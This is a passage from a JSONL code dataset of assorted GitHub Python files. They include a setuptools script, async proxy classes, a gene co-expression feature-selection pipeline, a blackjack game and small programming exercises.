\"\" and insightsUrl == \"\") or (insightsOneTitle == \"\") or (insightsOneMetric == \"\")):\n\t\t\tlogging.warning(\"Configuration for insightsOne Graph is inconsistent. You need to configure insightsUrl or insightsOneUrl AND insightsOneTitle AND insightsOneMetric\");\n\t\t\tinsightsOneEnabled = \"No\";\n\n\tif (insightsTwoEnabled.lower() == \"yes\"):\n\t\tif ((insightsTwoUrl == \"\" and insightsUrl == \"\") or (insightsTwoTitle == \"\") or (insightsTwoMetric == \"\")):\n\t\t\tlogging.warning(\"Configuration for InsightsTwo Graph is inconsistent. You need to configure insightsUrl or insightsTwoUrl AND insightsTwoTitle AND insightsTwoMetric\");\n\t\t\tinsightsTwoEnabled = \"No\";\n\n\t# Insights Thread...\n\tif (insightsOneEnabled.lower() == \"yes\" or insightsTwoEnabled.lower() == \"yes\"):\n\t\tinsights_thread = threading.Thread(target=insights_in_window, args=(logName, window_information, run_event))\n\t\tinsights_thread.start()\n\n\ttime.sleep(.2);\n\n\ttry:\n\t\twhile (quit == 0):\n\t\t\ttime.sleep(.1);\n\t\tif (quit == 1):\n\t\t\traise KeyboardInterrupt\n\texcept KeyboardInterrupt:\n\t\tshow_panel(panel_information['exit']);\n\t\tupdate_panels();\n\t\tdoupdate();\n\t\trun_event.clear();\n\t\tlog_thread.join();\n\t\tvmss_thread.join();\n\t\tcmd_thread.join();\n\t\tif (insightsOneEnabled.lower() == \"yes\" or insightsTwoEnabled.lower() == \"yes\"):\n\t\t\tinsights_thread.join();\n\t\twmove(window_information['exit'], 3, 5); wclrtoeol(window_information['exit']);\n\t\tbox(window_information['exit']);\n\t\twrite_str_color(window_information['exit'], 3, 6, \"Console Update threads successfully closed.\", 4, 1);\n\t\tupdate_panels();\n\t\tdoupdate();\n","repo_name":"code2exe/asciivmssdashboard","sub_path":"includes/azure.py","file_name":"azure.py","file_ext":"py","file_size_in_byte":29105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"34909876851","text":"import os\nimport shutil\nimport sys\nfrom setuptools import setup, find_packages\nfrom subprocess import call\nfrom setuptools.command.install import install\nfrom setuptools.command.develop import develop\n\nimport pkg_resources\n\nimport sys\nimport platform\nimport ctypes\nimport pip\n\n# **Python version check**\n#\n# This check is also made in IPython/__init__, don't forget to update both when\n# changing Python version requirements.\nif sys.version_info < (3, 8):\n pip_message = 'This may be due to an out of date pip. Make sure you have pip >= 9.0.1.'\n try:\n import pip\n pip_version = tuple([int(x) for x in pip.__version__.split('.')[:3]])\n if pip_version < (9, 0, 1) :\n pip_message = 'Your pip version is out of date, please install pip >= 9.0.1. '\\\n 'pip {} detected.'.format(pip.__version__)\n else:\n # pip is new enough - it must be something else\n pip_message = ''\n except Exception:\n pass\n\n\n error = \"\"\"\nIPython 7.0+ supports Python 3.4 and above.\nWhen using Python 2.7, please install IPython 5.x LTS Long Term Support version.\nPython 3.3 was supported up to IPython 6.x.\nSee IPython `README.rst` file for more information:\n https://github.com/ipython/ipython/blob/master/README.rst\nPython {py} detected.\n{pip}\n\"\"\".format(py=sys.version_info, pip=pip_message )\n\n print(error)\n sys.exit(1)\n\ndef read(fname):\n try:\n with open(os.path.join(os.path.dirname(__file__), fname)) as f:\n data = f.read()\n return data\n except BaseException:\n return None\n\n\ndef local_scheme(version):\n if version.distance and version.distance > 0:\n return '.post' + str(version.distance)\n else:\n return ''\n\n\ndef version_scheme(version):\n return str(version.tag)\n\n\nsys.path.append('studio/')\n# This file contains metadata related to the studioml client and python base\n# server software\n\n\nclass MyDevelop(develop):\n def run(self):\n call([\"pip install -r requirements-cs.txt --no-clean\"], shell=True)\n copyconfig()\n develop.run(self)\n\n\nclass MyInstall(install):\n\n def run(self):\n call([\"pip install -r requirements-cs.txt --no-clean\"], shell=True)\n copyconfig()\n install.run(self)\n\n\ndef copyconfig():\n config_path = os.path.expanduser('~/.studioml/config.yaml')\n default_config_path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n \"studio/default_config.yaml\")\n\n if not os.path.exists(config_path):\n if not os.path.exists(os.path.dirname(config_path)):\n os.makedirs(os.path.dirname(config_path))\n\n shutil.copyfile(\n default_config_path,\n os.path.expanduser('~/.studioml/config.yaml'))\n\n\nwith open('requirements-cs.txt') as f:\n required = f.read().splitlines()\n\nwith open('test_requirements-cs.txt') as f:\n test_required = f.read().splitlines()\n\n# Directly list packages we want to be included\ncs_packages = ['studio.artifacts',\n 'studio.util',\n 'studio.experiments',\n 'studio.storage',\n 'studio.dependencies_policies',\n 'studio.queues',\n 'studio.db_providers',\n 'studio.payload_builders',\n 'studio.credentials']\n\nsetup(\n name='studioml-cs',\n description='Base packages for StudioML functionality',\n packages=cs_packages,\n long_description=read('README.rst'),\n url='https://github.com/studioml/studio',\n license='Apache License, Version 2.0',\n keywords='studioml StudioML Studio',\n author='Andrei Denissov',\n author_email='andrei.denissov@gmail.com',\n data_files=[('test_requirements-cs.txt')],\n scripts=['studio/scripts/studio-local-worker'],\n test_suite='nose.collector',\n tests_require=test_required,\n use_scm_version={\n \"version_scheme\": version_scheme,\n \"local_scheme\": local_scheme},\n python_requires='>=3.8',\n setup_requires=['setuptools_scm', 'setuptools_scm_git_archive'],\n cmdclass={'develop': MyDevelop, 'install': MyInstall},\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Topic :: Utilities\",\n \"License :: OSI Approved :: Apache Software License\",\n ],\n install_requires=required,\n include_package_data=True,\n zip_safe=False)\n","repo_name":"studioml/studio","sub_path":"setup-cs.py","file_name":"setup-cs.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","stars":376,"dataset":"github-code","pt":"44"} +{"seq_id":"43241333999","text":"# if apllication has high income AND good credit eligible for loan\n#AND both condition are must be true\n# OR at list one condition must be true\n# NOT any boolean value true\nfrom re import T\n\n\nhas_high_income=False\nhas_good_income=True\n\nif has_high_income and has_good_income:\n print(\"elgible for loan\")\nelse:\n print(\"not elgible for loan\")","repo_name":"premkumar4461/pythncode","sub_path":"logicalOP.py","file_name":"logicalOP.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71631922052","text":"from Models.Ocorrencia import Ocorrencia\nfrom Telas.Tela import Tela,criarOpcoe\nfrom Telas.Ocorrencias.minhasOcorrencias import criarTelaMinhasOcorrencias\nfrom Telas.Ocorrencias.ocorrenciasProximas import criarTelaOcorrenciasProximas\nfrom opcoes import tiposOcorrencia,subtiposOcorrenciaCriminal,subtiposOcorrenciaCriminalValues,subtiposOcorrenciaEstrutural,subtiposOcorrenciaEstruturalValues,terminalSelect\nimport credenciais\n\ndef mostrarOcorrenciasProximas():\n ocorrenciasProximas = criarTelaOcorrenciasProximas()\n ocorrenciasProximas.show()\n\ndef mostrarMinhasOcorrencias():\n reloadMinhasOcorrencias = [True]\n\n while(reloadMinhasOcorrencias[0]):\n reloadMinhasOcorrencias[0] = False\n minhasOcorrencias = criarTelaMinhasOcorrencias(reloadMinhasOcorrencias) \n minhasOcorrencias.show()\n\ndef criarOcorrencia():\n \n latitude = None\n while(True):\n try:\n latitude = input(\"Latitude: \")\n latitude = str(float(latitude))\n\n break\n except:\n print(\"Latitude invalida.\")\n continue\n longitude = None\n while(True):\n try:\n longitude = input(\"Longitude: \")\n longitude = str(float(longitude))\n \n break\n\n except:\n print(\"Longitude invalida.\")\n continue\n \n \n print('----Tipo----')\n tipo = terminalSelect(tiposOcorrencia,None,False)\n print('----Subtipo----')\n if(tipo == 0):\n subtipo = terminalSelect(subtiposOcorrenciaCriminal,subtiposOcorrenciaCriminalValues,False)\n if(tipo == 1):\n subtipo = terminalSelect(subtiposOcorrenciaEstrutural,subtiposOcorrenciaEstruturalValues,False)\n descricao = input(\"Descricao: \")\n \n if(Ocorrencia.criar(latitude,longitude,tipo,subtipo,descricao,credenciais.usuario.toArray()[\"CPF\"])):\n print(\"Ocorrencia criada com sucesso!\")\n else:\n print(\"Algo deu errado na criacao da ocorrencia! Verifique sua conexao com a internet.\")\n print(\"Se o problema persistir, tente reiniciar o programa.\")\n\n\n\n \n\nopcoes = [ \n criarOpcoe('Ver ocorrencias proximas', mostrarOcorrenciasProximas), \n criarOpcoe('Minhas ocorrencias',mostrarMinhasOcorrencias),\n criarOpcoe('Criar ocorrencia',criarOcorrencia),\n ]\nback = criarOpcoe('Voltar')\n\n\nmenuOcorrencia = Tela(opcoes,back)","repo_name":"LucasGranela/community","sub_path":"Telas/Ocorrencias/menuOcorrencia.py","file_name":"menuOcorrencia.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12550717900","text":"from asyncio import open_connection, wait_for, sleep as async_sleep\nfrom websockets import connect\nfrom typing import Union\n\nfrom .connections import (\n ConnectionFactory,\n CONNECTION\n)\nfrom .constants import (\n CONNECTION_TYPE_TCP,\n CONNECTION_TYPE_WEBSOCKET,\n MIN_TIMEOUT\n)\n\n\n__author__ = 'Sergio Ivanuzzo'\n__license__ = 'Apache 2.0'\n__copyright__ = 'Copyright 2021, Idewavecore'\n\n\nclass BaseProxy:\n __slots__ = ('host', 'port', 'connection')\n\n def __init__(self, host: str, port: int):\n self.host = host\n self.port = port\n self.connection: Union[CONNECTION, None] = None\n\n async def connect(self):\n ...\n\n async def read(self, *args, **kwargs):\n ...\n\n async def write(self, *args, **kwargs):\n ...\n\n\nclass TCPProxy(BaseProxy):\n async def connect(self) -> None:\n reader, writer = await open_connection(self.host, self.port)\n self.connection = ConnectionFactory(CONNECTION_TYPE_TCP)\\\n .get_connection(reader, writer)\n\n async def read(self, amount: int) -> bytes:\n response = b''\n\n while True:\n data = await wait_for(\n self.connection.reader.read(amount),\n timeout=MIN_TIMEOUT\n )\n if not data:\n break\n\n response += data\n\n await async_sleep(MIN_TIMEOUT)\n\n return response\n\n async def write(self, request: bytes):\n self.connection.writer.write(request)\n await self.connection.writer.drain()\n\n\nclass WebsocketProxy(BaseProxy):\n async def connect(self) -> None:\n path: str = f'wss://{self.host}:{self.port}'\n websocket = await connect(path)\n self.connection = ConnectionFactory(CONNECTION_TYPE_WEBSOCKET)\\\n .get_connection(websocket, path)\n\n async def read(self) -> bytes:\n response: bytes = await self.connection.websocket.recv()\n return response\n\n async def write(self, request: bytes):\n await self.connection.websocket.send(request)\n\n\nclass ProxyFactory:\n def __init__(self, connection_type: str):\n self.connection_type = connection_type\n\n def get_proxy(self, *args, **kwargs):\n if self.connection_type == CONNECTION_TYPE_TCP:\n return TCPProxy(*args, **kwargs)\n elif self.connection_type == CONNECTION_TYPE_WEBSOCKET:\n return WebsocketProxy(*args, **kwargs)\n\n raise ValueError(f'Incorrect connection_type: \"{self.connection_type}\"')\n","repo_name":"idewave/idewavecore","sub_path":"idewavecore/network/proxies.py","file_name":"proxies.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"44"} +{"seq_id":"70041971973","text":"\n\nimport subprocess\nimport dataprocess\nimport CoexpressionDB\nimport sys\nimport os\nimport statistics \nfrom skrebate import ReliefF\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom multiprocessing import Process\nfrom os import system\n\n\n\ndef getCoexpressionGene(genename,Coexpresslist):\n Coexpressionlist= []\n for genepair in Coexpresslist:\n if genepair[\"gene1\"] == genename and not genepair[\"gene2\"] in Coexpressionlist:\n Coexpressionlist.append(genepair[\"gene2\"])\n elif genepair[\"gene2\"] == genename and not genepair[\"gene1\"] in Coexpressionlist:\n Coexpressionlist.append(genepair[\"gene1\"])\n \n return Coexpressionlist\n \n\n\n\n\n\ndef generateRouteAndCoexpressionfileDown(datafileexpresionfilepath, PathwayRoutefilepath,CoexpressionDir,subgroupdir,subgroupnumber,accuvaluethreshold,importancethreshold):\n accuvaluethreshold = int(accuvaluethreshold*subgroupnumber)\n # l = []\n # hunman\n biogridfilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/BiogridDB/BIOGRID-ORGANISM-Homo_sapiens-4.2.192.tab3.txt\"\n Stringlinkfilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/StringDB/Homo sampines/9606.protein.links.v11.0.txt\"\n Stringinfofilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/StringDB/Homo sampines/9606.protein.info.v11.0.txt\"\n # mouse\n # biogridfilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/BiogridDB/BIOGRID-ORGANISM-Mus_musculus-4.2.192.tab3.txt\"\n # Stringlinkfilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/StringDB/Mus musculus/10090.protein.links.v11.0.txt\"\n # Stringinfofilepath = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/CoexpressionDB/StringDB/Mus musculus/10090.protein.info.v11.0.txt\"\n\n\n\n Coexpresslist1 = CoexpressionDB.loadfileBiogrid(biogridfilepath)\n Coexpresslist2 = CoexpressionDB.loadfileString(Stringlinkfilepath,Stringinfofilepath)\n Coexpresslist = CoexpressionDB.combinetwodb(Coexpresslist1,Coexpresslist2)\n\n\n # # # using php to generate Scoreing first\n # print('C:/wamp64/bin/php/php5.6.40/php.exe', 'C:/Users/whl19/Documents/Code/GenebetweenPathways/pathwayscoreUtilies/score_pathways_cli.php',datafileexpresionfilepath,PathwayRoutefilepath)\n\n # # sys.exit()\n # if you want output\n result = subprocess.run(\n ['C:/wamp64/bin/php/php5.6.40/php.exe', 'C:/Users/whl19/Documents/Code/GenebetweenPathways/pathwayscoreUtilies/score_pathways_cli.php',datafileexpresionfilepath,PathwayRoutefilepath], # program and arguments\n stdout=subprocess.PIPE, # capture stdout\n check=False # raise exception if program fails\n ) \n\n # # sys.exit()\n\n expressiondata = dataprocess.loadfilematrix(datafileexpresionfilepath)\n\n\n with open(PathwayRoutefilepath,\"r\") as PathwayRoutefile:\n for line in PathwayRoutefile.readlines():\n linedata = line.strip().split(\"\\t\")\n if \"~p2~\" in linedata[1]:\n Secondline = linedata[1].replace(\"/\",\"\").split(\"~\")\n Sourcelist = Secondline[3].split(\",\")\n Sourceid = linedata[0].split(\"~\")[2]\n Targetlist = Secondline[5].split(\",\")\n Targetid = linedata[0].split(\"~\")[3]\n # Contains= linedata[1].split(\"~p2~\")[1].split(\",\")\n Coexpressionlist = []\n for genename in Sourcelist:\n dbselectlist = getCoexpressionGene(genename,Coexpresslist)\n Coexpressionlist=list(set(Coexpressionlist).union(set(dbselectlist)))\n \n with open(CoexpressionDir+linedata[1].split(\"~p2~\")[0]+\"_\"+Secondline[3]+\"_\"+Sourceid+\"_\"+Targetid+\".txt\",\"w\") as smallfile:\n title = \"Samplename\"\n for i in range(2,len(linedata)):\n title+=\"\\tS\"+str(i-1)\n smallfile.write(title+\"\\n\")\n\n p2line =\"p2\"\n for i in range(2,len(linedata)):\n p2line+=\"\\t\"+str(linedata[i]) \n smallfile.write(p2line+\"\\n\") \n for genename in Coexpressionlist :\n if genename in expressiondata.keys() and not genename in Sourcelist and not genename in Targetlist:\n pline = genename\n for value in expressiondata[genename]:\n pline+=\"\\t\"+str(value) \n smallfile.write(pline+\"\\n\")\n # do sub group\n dirname = linedata[1].split(\"~p2~\")[0]+\"_\"+Secondline[3]+\"_\"+Sourceid+\"_\"+Targetid\n handleAroute(subgroupnumber,dirname,CoexpressionDir,subgroupdir,accuvaluethreshold,importancethreshold)\n \n\n\ndef handleAroute(subgroupnumber,dirname,CoexpressionDir,subgroupdir,accuvaluethreshold,importancethreshold):\n print(subgroupdir+dirname)\n dataprocess.randomdatasplit(subgroupnumber,CoexpressionDir+dirname+\".txt\",subgroupdir+dirname+\"/\")\n Reliffeatureselection(subgroupnumber,subgroupdir+dirname+\"/\",\"p2\") \n Findcorrectgene(\"P2\",subgroupdir+dirname+\"/result/\",subgroupdir+dirname+\"/analy/\",accuvaluethreshold,isreg=False,ascend=True,toprate=importancethreshold)\n \n\n\n\ndef processRelif(index,datadir,targetgene):\n # print(index) \n genetic_data = pd.read_csv(datadir+str(index)+'_test.txt', sep='\\t')\n \n features, labels = genetic_data.drop(targetgene, axis=1).values, genetic_data[targetgene].values\n # Make sure to compute the feature importance scores from only your training set\n X_train, X_test, y_train, y_test = train_test_split(features, labels)\n fs = ReliefF()\n fs.fit(X_train, y_train)\n with open(datadir+\"/result/\"+str(index)+\"_result.txt\",\"w\") as resultfile:\n for feature_name, feature_score in zip(genetic_data.drop(targetgene, axis=1).columns,fs.feature_importances_):\n resultfile.write(feature_name+'\\t'+targetgene+'\\t'+str(feature_score)+\"\\n\")\n\n\ndef Reliffeatureselection(totalsubgroup,datadir,targetgene):\n l=[]\n targetgene = targetgene.upper()\n for index in range(totalsubgroup):\n # processRelif(index,datadir,targetgene)\n p = Process(target = processRelif,args=(index,datadir,targetgene))\n p.start()\n l.append(p) \n \n for p in l :\n p.join() \n\n # print(index) \n # genetic_data = pd.read_csv(datadir+str(index)+'_test.txt', sep='\\t')\n \n # features, labels = genetic_data.drop(targetgene, axis=1).values, genetic_data[targetgene].values\n # # Make sure to compute the feature importance scores from only your training set\n # X_train, X_test, y_train, y_test = train_test_split(features, labels)\n # fs = ReliefF()\n # fs.fit(X_train, y_train)\n # with open(datadir+\"/result/\"+str(index)+\"_result.txt\",\"w\") as resultfile:\n # for feature_name, feature_score in zip(genetic_data.drop(targetgene, axis=1).columns,fs.feature_importances_):\n # resultfile.write(feature_name+'\\t'+targetgene+'\\t'+str(feature_score)+\"\\n\")\n\ndef Findcorrectgene(findname,dirpath,resultpath,accuvaluethreshold,isreg=False,ascend=True,toprate=0.1):\n g = os.walk(dirpath) \n resultslist=[]\n for path,dir_list,file_list in g: \n for file_name in file_list:\n testresult = {}\n addlist = []\n with open(os.path.join(path, file_name),\"r\") as resultfile:\n for line in resultfile.readlines():\n linedata = line.strip().split(\"\\t\")\n TF = linedata[0].upper()\n\n target = linedata[1].upper()\n \n weight = float(linedata[2].upper())\n if isreg:\n if TF == findname:\n testresult[target] = weight\n else:\n if target == findname:\n testresult[TF] = weight\n\n testresult={k: v for k, v in sorted(testresult.items(), key=lambda item: item[1],reverse=ascend)}\n accpectnum = toprate*len(testresult)\n for key,valueweight in testresult.items():\n accpectnum-=1\n if accpectnum>=0:\n addlist.append(key) \n resultslist.append(addlist)\n selectgene ={}\n for addedlist in resultslist:\n for genename in addedlist:\n if genename not in selectgene.keys():\n selectgene[genename]=1\n else:\n selectgene[genename]+=1\n if isreg:\n filename = findname+\"_target.txt\"\n wastefilename = findname+\"_targetwaste.txt\"\n else:\n filename = findname+\"_regulator.txt\"\n wastefilename = findname+\"_regulatorwaste.txt\"\n with open(resultpath+filename,\"w\")as resultouputfile:\n with open(resultpath+wastefilename,\"w\")as resultouputwastefile:\n for genenamekey,accuvalue in selectgene.items():\n if accuvalue>= accuvaluethreshold:\n resultouputfile.write(genenamekey+\"\\t\"+str(accuvalue)+\"\\n\")\n resultouputwastefile.write(genenamekey+\"\\t\"+str(accuvalue)+\"\\n\")\n else:\n resultouputwastefile.write(genenamekey+\"\\t\"+str(accuvalue)+\"\\n\")\n\n\n\n# if __name__ == '__main__':\n\n # importancethreshold = 0.1\n # subgouppercentage = 0.7\n # subgroupnumber = 10\n # inputtable = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/DataMaterial/Cancer_data/TCGA_SKCM/TCGA_SKCM_log2ratio.txt\"\n # outputtable = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/Resultcombine/2-27-2021/TCGA_SKCM_RouteScore.txt\"\n # CoexpressionDir = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/Resultcombine/2-28-2021/CoexpressionDir/\"\n # subgroupdir = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/Resultcombine/2-28-2021/CoexpressionSubgroup/\"\n # generateRouteAndCoexpressionfileDown(inputtable, outputtable,CoexpressionDir,subgroupdir,subgroupnumber,subgouppercentage,importancethreshold)\n \n # datadir= \"C:/Users/whl19/Documents/Code/GenebetweenPathways/Resultcombine/2-18-2021/CoexpressionSubgroup/[8]Adherens junction/\"\n # Reliffeatureselection(10,datadir,\"P2\")\n\n # os.system(\"shutdown -s -t 1\")","repo_name":"Harry-Wang12/ctBuilder","sub_path":"code/Pyscript/RevisePathway/GetRouteandCoexpression.py","file_name":"GetRouteandCoexpression.py","file_ext":"py","file_size_in_byte":10471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41337930529","text":"# https://www.interviewcake.com/question/python3/merge-sorted-arrays\ndef merge_lists(a_list, b_list):\n a_index, b_index = 0, 0\n merged_list = []\n while a_index < len(a_list) and b_index < len(b_list):\n if a_list[a_index] < b_list[b_index]:\n merged_list.append(a_list[a_index])\n a_index += 1\n else:\n merged_list.append(b_list[b_index])\n b_index += 1\n while a_index < len(a_list):\n merged_list.append(a_list[a_index])\n a_index += 1\n while b_index < len(b_list):\n merged_list.append(b_list[b_index])\n b_index += 1\n return merged_list\n\n\nmy_list = [3, 4, 6, 10, 11, 15]\nalices_list = [1, 5, 8, 12, 14, 19]\n\n# Prints [1, 3, 4, 5, 6, 8, 10, 11, 12, 14, 15, 19]\nprint(merge_lists(my_list, alices_list))\n","repo_name":"Zedronar/algorithms-python","sub_path":"interviewcake/04. Merge Sorted Arrays.py","file_name":"04. Merge Sorted Arrays.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26851737059","text":"#!/usr/bin/env python\r\n# _*_ coding: utf-8 _*_\r\n\r\nfrom handler_executor import HandlerExecutor\r\n\r\n\r\nclass EnvExecutor(object):\r\n def __init__(self, handler_name, path, log):\r\n self.__handler = None\r\n self.__handler_name = handler_name\r\n self.__factory = HandlerExecutor(handler_name, path, log)\r\n self.__context = []\r\n self.__msg = ''\r\n\r\n def init(self):\r\n self.__handler = self.__factory.create_handler()\r\n if self.__handler:\r\n return True\r\n else:\r\n self.__msg = self.__factory.get_message()\r\n return False\r\n\r\n def execute(self):\r\n self.__handler.set_context(self.__context)\r\n if self.__handler.execute():\r\n return True\r\n else:\r\n self.__msg = self.__handler.get_message()\r\n return False\r\n\r\n def clear(self):\r\n if self.__handler.clear():\r\n return True\r\n else:\r\n self.__msg = self.__handler.get_message()\r\n return False\r\n\r\n def parse_conf(self, conf):\r\n self.__context = []\r\n for item in conf:\r\n param = item.get(self.__handler_name, None)\r\n if not param:\r\n continue\r\n self.__context.append(param)\r\n\r\n def get_message(self):\r\n return self.__msg\r\n","repo_name":"npczwh/Slast-AutoTest-Framework","sub_path":"scripts/env_executor.py","file_name":"env_executor.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"5698327567","text":"############### Blackjack Project #####################\n\n# Author: Alan Wong\n# Date: 13/01/2023\n\n############### Our Blackjack House Rules #####################\n\n## The deck is unlimited in size.\n## There are no jokers.\n## The Jack/Queen/King all count as 10.\n## The the Ace can count as 11 or 1.\n## Use the following list as the deck of cards:\n## cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n## The cards in the list have equal probability of being drawn.\n## Cards are not removed from the deck as they are drawn.\n## The computer is the dealer.\n\n\nimport random\nfrom art import logo\n\n# Create a deal_card() function that uses the List below to *return* a random card.\n#11 is the Ace.\n\ndef deal_card():\n \"\"\"Returns a random card from the deck\"\"\"\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n card = random.choice(cards)\n return card\n\n# Create a function called calculate_score() that takes a List of cards as input\n# and returns the score. \n \ndef calculate_score(hand):\n \"\"\"Takes a list of cards and returns the score\"\"\"\n score = sum(hand)\n # Check for a blackjack (a hand with only 2 cards: ace + 10) and return 0 \n # instead of the actual score. 0 will represent a blackjack in our game. \n if len(hand) == 2 and score == 21:\n return 0\n # Removing the 11 (Ace) inside a hand if the score is over 21 to become \n # a value of 1\n if 11 in hand and score > 21:\n hand.remove(11)\n hand.append(1)\n score -= 10\n \n return score\n\n# Hint 13: Create a function called compare() and pass in the user_score and computer_score. If the computer and user both have the same score, \n# then it's a draw. If the computer has a blackjack (0), then the user loses. If the user has a blackjack (0), then the user wins. If the user_score\n# is over 21, then the user loses. If the computer_score is over 21, then the computer loses. If none of the above, then the player with \n# the highest score wins.\n\ndef compare(user_score, computer_score):\n if user_score == computer_score:\n return \"It is a draw.\"\n elif computer_score == 0:\n return \"You lose. Computer has blackjack.\"\n elif user_score == 0:\n return \"You win! You have blackjack.\"\n elif user_score > 21:\n return \"You lose. Bust.\"\n elif computer_score > 21:\n return \"You win! Computer bust.\"\n elif user_score > computer_score:\n return \"You win! \"\n else: \n return \"You lose. \"\n \ndef play_blackjack(): \n # Deal the user and computer 2 cards each using deal_card() and append().\n user_cards = []\n user_cards.append(deal_card())\n user_cards.append(deal_card())\n computer_cards = []\n computer_cards.append(deal_card())\n computer_cards.append(deal_card())\n\n # Call calculate_score(). If the computer or the user has a blackjack (0) or if the user's score is over 21, then the game ends.\n game_over = False\n while game_over == False:\n # The score will need to be rechecked with every new card drawn and the checks\n # need to be repeated until the game ends.\n user_score = calculate_score(user_cards)\n computer_score = calculate_score(computer_cards)\n print(f\" Your cards: {user_cards}, current score: {user_score}\")\n print(f\" Computer's first card: {computer_cards[0]}\")\n \n if computer_score == 0 or user_score == 0 or user_score > 21:\n game_over = True\n # If the game has not ended, ask the user if they want to draw another card. If yes, then use the deal_card() function to add another card to the user_cards List. If no, then the game has ended.\n else: \n hit = input(\"Do you want to draw another card?: Type 'y' or 'n' \\n\")\n if hit == 'y':\n user_cards.append(deal_card())\n else: \n game_over = True\n \n\n # Once the user is done, it's time to let the computer draw. The computer should keep drawing cards as long as it has \n # a score less than 17.\n while computer_score != 0 and computer_score < 17:\n computer_cards.append(deal_card())\n computer_score = calculate_score(computer_cards)\n\n print(f\"Your final hand: {user_cards}, final score: {user_score}\")\n print(f\"Computer final hand: {computer_cards}, final score: {computer_score}\")\n print(compare(user_score, computer_score))\n\n# Ask the user if they want to restart the game. If they answer yes, clear the console and start a new game of \n# blackjack and show the logo from art.py.\n\nwhile (input(\"Do you want to play blackjack? Type 'y' or 'n' \\n\")) == 'y':\n print(logo)\n play_blackjack()\n\n\n\n","repo_name":"alantmwong/blackjack-start","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42062740262","text":"from src.tools import read_jsonline\nimport matplotlib.pyplot as plt\n\n\ndef sentence_distance_gold(dic):\n clusters = dic[\"clusters\"]\n sentences = dic[\"sentences\"]\n # print(clusters)\n pro_s = clusters[0][1][0]\n en_s = clusters[0][0][0]\n se_num = 0\n to_num = 0\n for sentence in sentences:\n for _ in sentence:\n if to_num == en_s:\n e_index = se_num\n if to_num == pro_s:\n p_index = se_num\n to_num += 1\n se_num += 1\n\n return p_index - e_index\n\n\ndef all_file_distance(path):\n file_l = read_jsonline(path)\n dic_r = {}\n method, process, problem, solution = {}, {}, {}, {}\n for i in file_l:\n r = sentence_distance_gold(i)\n sentences = sum(i[\"sentences\"], [])\n index = i[\"clusters\"][0][1][1]\n word = sentences[index]\n if word == \"solution\":\n if r in method:\n method[r] += 1\n else:\n method[r] = 1\n\n print(method)\n # method = sorted(method.items(), key=lambda item:item[1], reverse=True)\n # print(method)\n x = method.keys()\n y = method.values()\n # print(plt.style.available)\n # plt.style.use('fivethirtyeight') # bmh\n plt.figure(figsize=(200, 200))\n plt.bar(x, y, facecolor='lightskyblue', edgecolor='white', lw=2)\n x_tick = method.keys()\n plt.show()\n\n\nif __name__ == '__main__':\n path = \"/home/patsnap/PycharmProjects/webanno_preprocess/data/jsonline_data/new_training_data/merge_x4_z5_x1_z3.jsonlines\"\n all_file_distance(path)\n","repo_name":"mujizi/webanno_preprocess","sub_path":"src/statistics/sentence_distance.py","file_name":"sentence_distance.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73097553732","text":"def treesHit(right, down):\n f = open('day3input')\n forest = [line for line in f]\n\n tree_ctr = 0\n pos = 0\n for i, biome in enumerate(forest):\n if i % down == 0:\n while pos >= len(biome) - 1:\n biome = biome.strip()\n biome += biome\n\n if biome[pos] == '#':\n tree_ctr += 1\n\n pos += right\n return tree_ctr\n\n\na = treesHit(1, 1)\nb = treesHit(3, 1)\nc = treesHit(5, 1)\nd = treesHit(7, 1)\ne = treesHit(1, 2)\n# print(a)\nprint(a * b * c * d * e)\n","repo_name":"blanks-hub/MyAdventOfCode2020","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1333116536","text":"# likelihood_refit.py\nimport torch\nimport torch.distributions as D\n\n# from tabulate import tabulate\n\n\n# from framework.utils import print_dict\n# import termplot as tplot\n\n# from typing import List\nfrom mercergp.eigenvalue_gen import (\n EigenvalueGenerator,\n SmoothExponentialFasshauer,\n)\nfrom mercergp.kernels import 